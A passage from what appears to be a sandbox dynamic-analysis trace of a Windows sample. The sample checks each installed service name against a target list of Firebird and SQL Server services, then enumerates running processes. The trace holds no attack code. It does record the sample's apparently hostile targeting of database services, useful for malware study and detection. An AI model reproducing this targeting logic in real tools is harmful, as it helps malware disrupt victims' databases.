lpString2="LanmanServer") returned 1 [0159.904] lstrlenW (lpString="LanmanWorkstation") returned 17 [0159.905] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0159.905] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0159.905] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0159.905] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0159.905] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0159.905] lstrlenW (lpString="lfsvc") returned 5 [0159.905] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0159.905] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0159.905] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0159.905] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0159.905] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0159.905] lstrlenW (lpString="lmhosts") returned 7 [0159.905] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0159.905] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0159.905] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0159.905] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0159.905] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0159.906] lstrlenW (lpString="LSM") returned 3 [0159.906] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0159.906] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0159.906] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0159.906] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0159.906] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0159.906] lstrlenW (lpString="MpsSvc") returned 6 [0159.906] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0159.906] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0159.906] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0159.906] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0159.906] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0159.906] lstrlenW (lpString="NcbService") returned 10 [0159.906] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0159.906] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0159.906] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0159.906] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0159.906] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0159.906] lstrlenW (lpString="netprofm") returned 8 [0159.906] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0159.906] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0159.906] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0159.906] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0159.906] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0159.906] lstrlenW (lpString="NlaSvc") returned 6 [0159.906] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0159.906] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0159.906] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0159.906] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0159.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0159.907] lstrlenW (lpString="nsi") returned 3 [0159.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0159.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0159.907] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0159.907] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0159.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0159.907] lstrlenW (lpString="PcaSvc") returned 6 [0159.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0159.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0159.907] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0159.907] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0159.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0159.907] lstrlenW (lpString="PlugPlay") returned 8 [0159.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0159.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0159.907] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0159.907] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0159.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0159.907] lstrlenW (lpString="Power") returned 5 [0159.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0159.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0159.907] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0159.907] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0159.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0159.907] lstrlenW (lpString="ProfSvc") returned 7 [0159.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0159.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0159.908] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0159.908] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0159.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0159.908] lstrlenW (lpString="RpcEptMapper") returned 12 [0159.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0159.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0159.908] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0159.908] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0159.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0159.908] lstrlenW (lpString="RpcSs") returned 5 [0159.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0159.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0159.908] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0159.908] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0159.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0159.908] lstrlenW (lpString="SamSs") returned 5 [0159.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0159.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0159.908] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0159.908] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0159.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0159.908] lstrlenW (lpString="Schedule") returned 8 [0159.908] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0159.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0159.908] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0159.908] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0159.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0159.909] lstrlenW (lpString="SecurityHealthService") returned 21 [0159.909] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0159.909] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0159.909] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0159.909] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0159.909] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0159.909] lstrlenW (lpString="SENS") returned 4 [0159.909] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0159.909] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0159.909] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0159.909] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0159.909] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0159.909] lstrlenW (lpString="ShellHWDetection") returned 16 [0159.909] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0159.909] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0159.909] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0159.909] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0159.909] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0159.909] lstrlenW (lpString="Spooler") returned 7 [0159.909] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0159.909] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0159.909] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0159.909] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0159.909] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0159.909] lstrlenW (lpString="sppsvc") returned 6 [0159.909] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="sppsvc") returned -1 [0159.909] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="sppsvc") returned -1 [0159.909] lstrcmpiW (lpString1="sqlwriter", lpString2="sppsvc") returned 1 [0159.910] lstrcmpiW (lpString1="mssqlserver", lpString2="sppsvc") returned -1 [0159.910] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="sppsvc") returned 1 [0159.910] lstrlenW (lpString="SSDPSRV") returned 7 [0159.910] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0159.910] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0159.910] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0159.910] lstrcmpiW (lpString1="mssqlserver", lpString2="SSDPSRV") returned -1 [0159.910] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SSDPSRV") returned -1 [0159.910] lstrlenW (lpString="StateRepository") returned 15 [0159.910] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0159.910] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0159.910] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0159.910] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0159.910] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0159.910] lstrlenW (lpString="SysMain") returned 7 [0159.910] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0159.910] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0159.910] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0159.910] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0159.910] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0159.910] lstrlenW (lpString="SystemEventsBroker") returned 18 [0159.910] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0159.910] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0159.910] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0159.910] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0159.911] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x76b778 | out: hHeap=0x710000) returned 1 [0159.911] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x29c [0160.119] Process32FirstW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0160.120] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0160.121] lstrlenW (lpString="System") returned 6 [0160.121] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0160.121] lstrlenW (lpString="smss.exe") returned 8 [0160.121] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0160.122] lstrlenW (lpString="csrss.exe") returned 9 [0160.122] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0160.123] lstrlenW (lpString="wininit.exe") returned 11 [0160.123] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0160.123] lstrlenW (lpString="csrss.exe") returned 9 [0160.123] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d4, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0160.124] lstrlenW (lpString="winlogon.exe") returned 12 [0160.124] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0160.125] lstrlenW (lpString="services.exe") returned 12 [0160.125] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1dc, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0160.125] lstrlenW (lpString="lsass.exe") returned 9 [0160.125] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.126] lstrlenW (lpString="svchost.exe") returned 11 [0160.126] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x220, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0160.127] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0160.127] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0160.127] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0160.127] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x304, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.128] lstrlenW (lpString="svchost.exe") returned 11 [0160.128] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x220, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0160.129] lstrlenW (lpString="dwm.exe") returned 7 [0160.129] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x62, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.129] lstrlenW (lpString="svchost.exe") returned 11 [0160.129] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.130] lstrlenW (lpString="svchost.exe") returned 11 [0160.130] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.131] lstrlenW (lpString="svchost.exe") returned 11 [0160.131] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.218] lstrlenW (lpString="svchost.exe") returned 11 [0160.218] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x350, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.219] lstrlenW (lpString="svchost.exe") returned 11 [0160.219] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x434, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.220] lstrlenW (lpString="svchost.exe") returned 11 [0160.220] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.220] lstrlenW (lpString="svchost.exe") returned 11 [0160.220] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.221] lstrlenW (lpString="svchost.exe") returned 11 [0160.221] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.221] lstrlenW (lpString="svchost.exe") returned 11 [0160.221] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.222] lstrlenW (lpString="svchost.exe") returned 11 [0160.222] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0160.223] lstrlenW (lpString="spoolsv.exe") returned 11 [0160.223] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.224] lstrlenW (lpString="svchost.exe") returned 11 [0160.224] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x554, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0160.224] lstrlenW (lpString="audiodg.exe") returned 11 [0160.224] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x708, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0160.225] lstrlenW (lpString="sihost.exe") returned 10 [0160.225] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0160.226] lstrlenW (lpString="svchost.exe") returned 11 [0160.226] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0160.226] lstrlenW (lpString="taskhostw.exe") returned 13 [0160.226] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x560, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x34, th32ParentProcessID=0x568, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0160.227] lstrlenW (lpString="explorer.exe") returned 12 [0160.227] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x818, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0160.227] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0160.227] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x84c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0160.228] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0160.228] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0160.228] lstrlenW (lpString="Memory Compression") returned 18 [0160.228] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0160.229] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0160.229] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0160.229] lstrlenW (lpString="SearchUI.exe") returned 12 [0160.229] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbe4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0160.230] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0160.230] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: lppe=0x24efd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0160.231] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0160.231] Process32NextW (in: hSnapshot=0x29c, lppe=0x24efd2c | out: 